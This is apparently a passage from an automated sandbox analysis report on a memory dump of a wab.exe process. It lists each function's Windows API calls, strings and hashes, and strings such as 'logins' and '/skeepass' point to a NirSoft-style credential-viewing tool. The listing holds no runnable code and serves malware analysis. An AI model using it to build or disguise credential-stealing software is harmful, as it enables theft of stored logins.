                  • Instruction Fuzzy Hash: B1212EA0B857087AF63137B2DC4BF7B7A5EDF81B89F214410F35C990E0C9E6AC108929
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: ??2@??3@_snwprintfwcscpy
                  • String ID: %4.4X%4.4X$040904E4$CompanyName$FileDescription$FileVersion$InternalName$LegalCopyright$OriginalFileName$ProductName$ProductVersion$\VarFileInfo\Translation
                  • API String ID: 2899246560-1542517562
                  • Opcode ID: e17f1f04e88a4cb48931d1772d94f5796c3f29ffdcb1b521dadae3bcfb684220
                  • Instruction ID: ddb1140ba30d93f946c39142265044aeba6ebe712c4753dd77c76fa61262b17a
                  • Opcode Fuzzy Hash: e17f1f04e88a4cb48931d1772d94f5796c3f29ffdcb1b521dadae3bcfb684220
                  • Instruction Fuzzy Hash: 434127B2900218BAD704EFA1DC82DDEB7BCBF49305B110167BD05B3152DB78A655CBE8
                  APIs
                  • memset.MSVCRT ref: 0040DBCD
                  • memset.MSVCRT ref: 0040DBE9
                    • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                    • Part of subcall function 004447D9: ??2@YAPAXI@Z.MSVCRT ref: 0044480A
                    • Part of subcall function 004447D9: _snwprintf.MSVCRT ref: 0044488A
                    • Part of subcall function 004447D9: wcscpy.MSVCRT ref: 004448B4
                  • wcscpy.MSVCRT ref: 0040DC2D
                  • wcscpy.MSVCRT ref: 0040DC3C
                  • wcscpy.MSVCRT ref: 0040DC4C
                  • EnumResourceNamesW.KERNEL32(?,00000004,Function_0000D957,00000000), ref: 0040DCB1
                  • EnumResourceNamesW.KERNEL32(?,00000005,Function_0000D957,00000000), ref: 0040DCBB
                  • wcscpy.MSVCRT ref: 0040DCC3
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: wcscpy$EnumNamesResourcememset$??2@FileModuleName_snwprintf
                  • String ID: RTL$TranslatorName$TranslatorURL$Version$general$strings
                  • API String ID: 3330709923-517860148
                  • Opcode ID: 8014600ebdaa413990019ca607550d51b11cce94ae1a09dd3fff3b2e07bb1862
                  • Instruction ID: fd1c33b42c1478e8908a3567a27dc6f764f3595523656020fa754494b197929d
                  • Opcode Fuzzy Hash: 8014600ebdaa413990019ca607550d51b11cce94ae1a09dd3fff3b2e07bb1862
                  • Instruction Fuzzy Hash: 2121ACB2D4021876D720B7929C46ECF7B6CAF41759F010477B90C72083DAB95B98CAAE
                  APIs
                    • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                    • Part of subcall function 0040CC26: FindCloseChangeNotification.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                    • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                  • memset.MSVCRT ref: 0040806A
                  • memset.MSVCRT ref: 0040807F
                  • _wtoi.MSVCRT ref: 004081AF
                  • _wcsicmp.MSVCRT ref: 004081C3
                  • memset.MSVCRT ref: 004081E4
                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,0000012E,000000FF,?,000003FF,00000000,00000000,0000012E,00000000,0000012D,?,?,?,?,?), ref: 00408218
                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040822F
                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408246
                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040825D
                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408274
                    • Part of subcall function 00407FC3: _wtoi64.MSVCRT ref: 00407FC7
                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040828B
                    • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E44
                    • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E5B
                    • Part of subcall function 00407E1E: _mbscpy.MSVCRT ref: 00407E7E
                    • Part of subcall function 00407E1E: _mbscpy.MSVCRT ref: 00407ED7
                    • Part of subcall function 00407E1E: _mbscpy.MSVCRT ref: 00407EEE
                    • Part of subcall function 00407E1E: _mbscpy.MSVCRT ref: 00407F01
                    • Part of subcall function 00407E1E: wcscpy.MSVCRT ref: 00407F10
                    • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                    • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: ByteCharMultiWide$memset$_mbscpy$_wcsicmp$ChangeCloseFileFindNotificationSize_wtoi_wtoi64wcscpy
                  • String ID: logins$null
                  • API String ID: 3492182834-2163367763
                  • Opcode ID: 09a376002f14fa1f9e0d48ac719059c44ef41498ede045729c177772a5669da3
                  • Instruction ID: fdf7b148d119976dec4a4ca0125bd44813aaa3c4ab878784613783167982a03f
                  • Opcode Fuzzy Hash: 09a376002f14fa1f9e0d48ac719059c44ef41498ede045729c177772a5669da3
                  • Instruction Fuzzy Hash: 48713371904219AEEF10BBA2DD82DDF767DEF00318F10457FB508B61C2DA785E458BA9
                  APIs
                    • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                  • GetFileSize.KERNEL32(00000000,00000000,?,00000001,00000000,?,004089ED,?,?,?,0000001E,?,?,00000104), ref: 00408589
                  • ??2@YAPAXI@Z.MSVCRT ref: 0040859D
                    • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                  • memset.MSVCRT ref: 004085CF
                  • memset.MSVCRT ref: 004085F1
                  • memset.MSVCRT ref: 00408606
                  • strcmp.MSVCRT ref: 00408645
                  • _mbscpy.MSVCRT ref: 004086DB
                  • _mbscpy.MSVCRT ref: 004086FA
                  • memset.MSVCRT ref: 0040870E
                  • strcmp.MSVCRT ref: 0040876B
                  • ??3@YAXPAX@Z.MSVCRT ref: 0040879D
                  • CloseHandle.KERNEL32(?,?,004089ED,?,?,?,0000001E,?,?,00000104,?,?,00000104,?,?,00000104), ref: 004087A6
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: memset$File$_mbscpystrcmp$??2@??3@CloseCreateHandleReadSize
                  • String ID: ---
                  • API String ID: 3437578500-2854292027
                  • Opcode ID: c5c02c04611bcd29229c4833ebed6afde2d02892c84083fd30bc2caee93791c4
                  • Instruction ID: 4c5fbc017ddd4a43d5b0f69e9578b2b0908928dff5e121bfcb53d45818d158f6
                  • Opcode Fuzzy Hash: c5c02c04611bcd29229c4833ebed6afde2d02892c84083fd30bc2caee93791c4
                  • Instruction Fuzzy Hash: 256191B2C0421DAADF20DB948D819DEBBBCAB15314F1140FFE558B3141DA399BC4CBA9
                  APIs
                  • memset.MSVCRT ref: 0041087D
                  • memset.MSVCRT ref: 00410892
                  • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                  • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                  • SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                  • SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                  • GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                  • LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                  • GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                  • LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                  • GetSysColor.USER32(0000000F), ref: 00410999
                  • DeleteObject.GDI32(?), ref: 004109D0
                  • DeleteObject.GDI32(?), ref: 004109D6
                  • SendMessageW.USER32(00000000,00001208,00000000,?), ref: 004109F3
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: MessageSend$DeleteHandleImageLoadModuleObjectmemset$ColorDirectoryFileInfoWindows
                  • String ID:
                  • API String ID: 1010922700-0
                  • Opcode ID: 9f32c972fd3bed260489b92fc8884ca82be835491797332215144efe3993187c
                  • Instruction ID: e9b684d61d60cc1afb152275eb3c8de820581b68aaecd99ee02cab8be193ddee
                  • Opcode Fuzzy Hash: 9f32c972fd3bed260489b92fc8884ca82be835491797332215144efe3993187c
                  • Instruction Fuzzy Hash: 48418575640304BFF720AF61DC8AF97779CFB09744F000829F399A51E1D6F6A8909B29
                  APIs
                    • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                  • GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                  • malloc.MSVCRT ref: 004186B7
                  • ??3@YAXPAX@Z.MSVCRT ref: 004186C7
                  • GetFullPathNameW.KERNEL32(00000000,-00000003,00000000,00000000), ref: 004186DB
                  • ??3@YAXPAX@Z.MSVCRT ref: 004186E0
                  • GetFullPathNameA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186F6
                  • malloc.MSVCRT ref: 004186FE
                  • GetFullPathNameA.KERNEL32(00000000,-00000003,00000000,00000000), ref: 00418711
                  • ??3@YAXPAX@Z.MSVCRT ref: 00418716
                  • ??3@YAXPAX@Z.MSVCRT ref: 0041872A
                  • ??3@YAXPAX@Z.MSVCRT ref: 00418749
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: ??3@$FullNamePath$malloc$Version
                  • String ID: |A
                  • API String ID: 4233704886-1717621600
                  • Opcode ID: 66b970c2726a19c6cf161dcebd973c19408ec610aa0d83d05880a80435803f02
                  • Instruction ID: f8a1ad7f3386c3a0ca67e8408a701755caa4d882ef8d2f884b3bc60851bd4b4d
                  • Opcode Fuzzy Hash: 66b970c2726a19c6cf161dcebd973c19408ec610aa0d83d05880a80435803f02
                  • Instruction Fuzzy Hash: F5217432900118BFEF11BFA6DC46CDFBB79DF41368B22006FF804A2161DA799E91995D
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: _wcsicmp
                  • String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
                  • API String ID: 2081463915-1959339147
                  • Opcode ID: 28c2ebe8ae336333f434d0f7201133c37a7c95e7bcc6e3a748ef2c38aa05b661
                  • Instruction ID: 8733bd8b557f913067c5021fbfe18d0583d9fd94efe92a6f612d034962822ca0
                  • Opcode Fuzzy Hash: 28c2ebe8ae336333f434d0f7201133c37a7c95e7bcc6e3a748ef2c38aa05b661
                  • Instruction Fuzzy Hash: A401843328931228FA2538663D07F834F48CB52BBBF32405BF800D81C6FE8C4565605E
                  APIs
                    • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                    • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                    • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                    • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                    • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                    • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                  • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004138ED
                  • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004138FE
                  • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExW), ref: 0041390F
                  • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00413920
                  • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 00413931
                  • FreeLibrary.KERNEL32(00000000), ref: 00413951
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                  • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                  • API String ID: 2012295524-70141382
                  • Opcode ID: de34bece31b7142a998ab6ccb1b4abbedb6e98f3c738f5240e3b00242a7e4309
                  • Instruction ID: 1ed0e205fb1d3ca6b4a3c81c58fecbd4dea9624ac3f9f6029147382c5f000437
                  • Opcode Fuzzy Hash: de34bece31b7142a998ab6ccb1b4abbedb6e98f3c738f5240e3b00242a7e4309
                  • Instruction Fuzzy Hash: 7301B5B1905312DAD7705F31AE40B6B2FA45B81FA7B10003BEA00D1286DBFCC8C5DA6E
                  APIs
                  • GetModuleHandleW.KERNEL32(kernel32.dll,?,0041339D), ref: 0041384C
                  • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 00413865
                  • GetProcAddress.KERNEL32(00000000,Module32First), ref: 00413876
                  • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 00413887
                  • GetProcAddress.KERNEL32(00000000,Process32First), ref: 00413898
                  • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 004138A9
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: AddressProc$HandleModule
                  • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                  • API String ID: 667068680-3953557276
                  • Opcode ID: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                  • Instruction ID: ced2a49a11d8a5ad7e856d80fa96ce31c371be68fc2c17877008b9264e9f9212
                  • Opcode Fuzzy Hash: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                  • Instruction Fuzzy Hash: 58F08631900317A9E7206F357D41B672AE45B86F83714017BFC04D12D9DB7CE98A9B6D
                  APIs
                  • GetDC.USER32(00000000), ref: 004121FF
                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0041220A
                  • ReleaseDC.USER32(00000000,00000000), ref: 0041221F
                  • SetBkMode.GDI32(?,00000001), ref: 00412232
                  • SetTextColor.GDI32(?,00FF0000), ref: 00412240
                  • SelectObject.GDI32(?,?), ref: 00412251
                  • DrawTextExW.USER32(?,?,000000FF,?,00000024,?), ref: 00412285
                  • SelectObject.GDI32(00000014,00000005), ref: 00412291
                    • Part of subcall function 00411FC6: GetCursorPos.USER32(?), ref: 00411FD0
                    • Part of subcall function 00411FC6: GetSubMenu.USER32(?,00000000), ref: 00411FDE
                    • Part of subcall function 00411FC6: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0041200F
                  • GetModuleHandleW.KERNEL32(00000000), ref: 004122AC
                  • LoadCursorW.USER32(00000000,00000067), ref: 004122B5
                  • SetCursor.USER32(00000000), ref: 004122BC
                  • PostMessageW.USER32(?,00000428,00000000,00000000), ref: 00412304
                  • memcpy.MSVCRT ref: 0041234D
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: Cursor$MenuObjectSelectText$CapsColorDeviceDrawHandleLoadMessageModeModulePopupPostReleaseTrackmemcpy
                  • String ID:
                  • API String ID: 1700100422-0
                  • Opcode ID: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
                  • Instruction ID: eb413d4c014922f01c1be241ee45634b3e5b5e29cfe5fc1015c733cb557b7a75
                  • Opcode Fuzzy Hash: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
                  • Instruction Fuzzy Hash: 0F61D331600109AFDB149F74CE89BEA77A5BB45300F10052AFA25D7291DBBC9CB1DB59
                  APIs
                  • GetClientRect.USER32(?,?), ref: 004111E0
                  • GetWindowRect.USER32(?,?), ref: 004111F6
                  • GetWindowRect.USER32(?,?), ref: 0041120C
                  • GetDlgItem.USER32(00000000,0000040D), ref: 00411246
                  • GetWindowRect.USER32(00000000), ref: 0041124D
                  • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0041125D
                  • BeginDeferWindowPos.USER32(00000004), ref: 00411281
                  • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 004112A4
                  • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 004112C3
                  • DeferWindowPos.USER32(?,?,00000000,00000000,000000DC,?,?,00000004), ref: 004112EE
                  • DeferWindowPos.USER32(?,00000000,00000000,00000000,?,?,000000DC,00000004), ref: 00411306
                  • EndDeferWindowPos.USER32(?), ref: 0041130B
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: Window$Defer$Rect$BeginClientItemPoints
                  • String ID:
                  • API String ID: 552707033-0
                  • Opcode ID: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                  • Instruction ID: 1a89c9de14f4e003cb1acc22e2fe5cfe68aec74c13575a54a2aa846d798aa5ff
                  • Opcode Fuzzy Hash: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                  • Instruction Fuzzy Hash: 3B41D375900209FFEB11DFA8DD89FEEBBBAFB48300F104469F655A61A0C771AA50DB14
                  APIs
                  • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,?,?,?,0040C255,?,?,*.*,0040C2BF,00000000), ref: 0040C0A4
                    • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                  • GetFileSize.KERNEL32(00000000,00000000), ref: 0040C0D4
                    • Part of subcall function 0040BFF3: _memicmp.MSVCRT ref: 0040C00D
                    • Part of subcall function 0040BFF3: memcpy.MSVCRT ref: 0040C024
                  • memcpy.MSVCRT ref: 0040C11B
                  • strchr.MSVCRT ref: 0040C140
                  • strchr.MSVCRT ref: 0040C151
                  • _strlwr.MSVCRT ref: 0040C15F
                  • memset.MSVCRT ref: 0040C17A
                  • CloseHandle.KERNEL32(00000000), ref: 0040C1C7
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: File$memcpystrchr$CloseCreateHandlePointerSize_memicmp_strlwrmemset
                  • String ID: 4$h
                  • API String ID: 4066021378-1856150674
                  • Opcode ID: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
                  • Instruction ID: ad7b68c589633d756b108d453181f98220e50dbf4ed18f1a1dc8c2c6e1bbf79d
                  • Opcode Fuzzy Hash: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
                  • Instruction Fuzzy Hash: F531C2B2800218FEEB20EB54CC85EEE73BCEF05354F14416AF508A6181D7389F558FA9
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: memset$_snwprintf
                  • String ID: %%0.%df
                  • API String ID: 3473751417-763548558
                  • Opcode ID: d3ed19b3c5d3f5d27fcb945595af099acb5609e53fc24cbfd77fa4eb0abb8f2a
                  • Instruction ID: e3e507119e413e1699737691dcc770ce903c50d69a4f0c7cc4f670013a5326e5
                  • Opcode Fuzzy Hash: d3ed19b3c5d3f5d27fcb945595af099acb5609e53fc24cbfd77fa4eb0abb8f2a
                  • Instruction Fuzzy Hash: 2D318F71800129BBEB20DF95CC85FEB77BCFF49304F0104EAB509A2155E7349A94CBA9
                  APIs
                  • SetTimer.USER32(?,00000041,00000064,00000000), ref: 004060C7
                  • KillTimer.USER32(?,00000041), ref: 004060D7
                  • KillTimer.USER32(?,00000041), ref: 004060E8
                  • GetTickCount.KERNEL32 ref: 0040610B
                  • GetParent.USER32(?), ref: 00406136
                  • SendMessageW.USER32(00000000), ref: 0040613D
                  • BeginDeferWindowPos.USER32(00000004), ref: 0040614B
                  • EndDeferWindowPos.USER32(00000000), ref: 0040619B
                  • InvalidateRect.USER32(?,?,00000001), ref: 004061A7
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: Timer$DeferKillWindow$BeginCountInvalidateMessageParentRectSendTick
                  • String ID: A
                  • API String ID: 2892645895-3554254475
                  • Opcode ID: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                  • Instruction ID: 3d646c34c65c30a23a549f03b0efc12359fcfb722ff8df3f2fd47db5f06942f8
                  • Opcode Fuzzy Hash: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                  • Instruction Fuzzy Hash: 67318F75240304BBEB205F62DC85F6A7B6ABB44742F018539F3067A5E1C7F998A18B58
                  APIs
                  • LoadMenuW.USER32(?,?), ref: 0040D97F
                    • Part of subcall function 0040D7A7: GetMenuItemCount.USER32(?), ref: 0040D7BD
                    • Part of subcall function 0040D7A7: memset.MSVCRT ref: 0040D7DC
                    • Part of subcall function 0040D7A7: GetMenuItemInfoW.USER32 ref: 0040D818
                    • Part of subcall function 0040D7A7: wcschr.MSVCRT ref: 0040D830
                  • DestroyMenu.USER32(00000000), ref: 0040D99D
                  • CreateDialogParamW.USER32(?,?,00000000,0040D952,00000000), ref: 0040D9F2
                  • GetDesktopWindow.USER32 ref: 0040D9FD
                  • CreateDialogParamW.USER32(?,?,00000000), ref: 0040DA0A
                  • memset.MSVCRT ref: 0040DA23
                  • GetWindowTextW.USER32(00000005,?,00001000), ref: 0040DA3A
                  • EnumChildWindows.USER32(00000005,Function_0000D898,00000000), ref: 0040DA67
                  • DestroyWindow.USER32(00000005), ref: 0040DA70
                    • Part of subcall function 0040D5D6: _snwprintf.MSVCRT ref: 0040D5FB
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: Menu$Window$CreateDestroyDialogItemParammemset$ChildCountDesktopEnumInfoLoadTextWindows_snwprintfwcschr
                  • String ID: caption
                  • API String ID: 973020956-4135340389
                  • Opcode ID: 5e414436bb8e275bf9a16e2693900a7463b03ad76ebaf029bad5c7ef584cf34d
                  • Instruction ID: d77e6bedd7727d4aace6f5c0bd160524984489d6dc7b24eaa8e7ecc9459ec1fc
                  • Opcode Fuzzy Hash: 5e414436bb8e275bf9a16e2693900a7463b03ad76ebaf029bad5c7ef584cf34d
                  • Instruction Fuzzy Hash: 60319072900208BFEF11AF91DC85EAA3B78FF04315F10843AF909A61A1D7799D58CF59
                  APIs
                  Strings
                  • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 00410A70
                  • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 00410B3C
                  • <table dir="rtl"><tr><td>, xrefs: 00410B00
                  • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00410ADD
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: memset$_snwprintf$wcscpy
                  • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
                  • API String ID: 1283228442-2366825230
                  • Opcode ID: 2928c1e4db6f8540118cb54ef1ff53e3c28d5a36283f281326c9c00f9b8dcb63
                  • Instruction ID: da896b014e5ee892582fb8e7d48e4383de9842bc572d8210300f5843ce7472f7
                  • Opcode Fuzzy Hash: 2928c1e4db6f8540118cb54ef1ff53e3c28d5a36283f281326c9c00f9b8dcb63
                  • Instruction Fuzzy Hash: 5C2182B69002197BDB21AB95CC41EDE77BCAF08785F0040ABF549D3151DA789F888BA9
                  APIs
                  • wcschr.MSVCRT ref: 00413972
                  • wcscpy.MSVCRT ref: 00413982
                    • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                    • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                    • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                  • wcscpy.MSVCRT ref: 004139D1
                  • wcscat.MSVCRT ref: 004139DC
                  • memset.MSVCRT ref: 004139B8
                    • Part of subcall function 00409DD5: GetWindowsDirectoryW.KERNEL32(0045DC58,00000104,?,00413A11,?,?,00000000,00000208,?), ref: 00409DEB
                    • Part of subcall function 00409DD5: wcscpy.MSVCRT ref: 00409DFB
                  • memset.MSVCRT ref: 00413A00
                  • memcpy.MSVCRT ref: 00413A1B
                  • wcscat.MSVCRT ref: 00413A27
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: wcscpy$memsetwcscatwcslen$DirectoryWindows_memicmpmemcpywcschr
                  • String ID: \systemroot
                  • API String ID: 4173585201-1821301763
                  • Opcode ID: e4551322c16c9acef98fc86a4838192e22c045fa3321ccd57a54cdfa3ae28df9
                  • Instruction ID: a9582ad2fab6187976d7b5f1d827ce349b207672d34ede1993470c6c3fb504e1
                  • Opcode Fuzzy Hash: e4551322c16c9acef98fc86a4838192e22c045fa3321ccd57a54cdfa3ae28df9
                  • Instruction Fuzzy Hash: 7D21F6F68053146AE720FB619C86EEF73EC9F06719F20415FF115A20C6EA7C9A844B5E
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: wcscpy
                  • String ID: AppData$Common Desktop$Common Programs$Common Start Menu$Common Startup$Desktop$Favorites$Programs$Start Menu$Startup
                  • API String ID: 1284135714-318151290
                  • Opcode ID: dc6868dd8f5dbcd850853512a46c22a4be17f2be4da4ff30984607c28efcaa9d
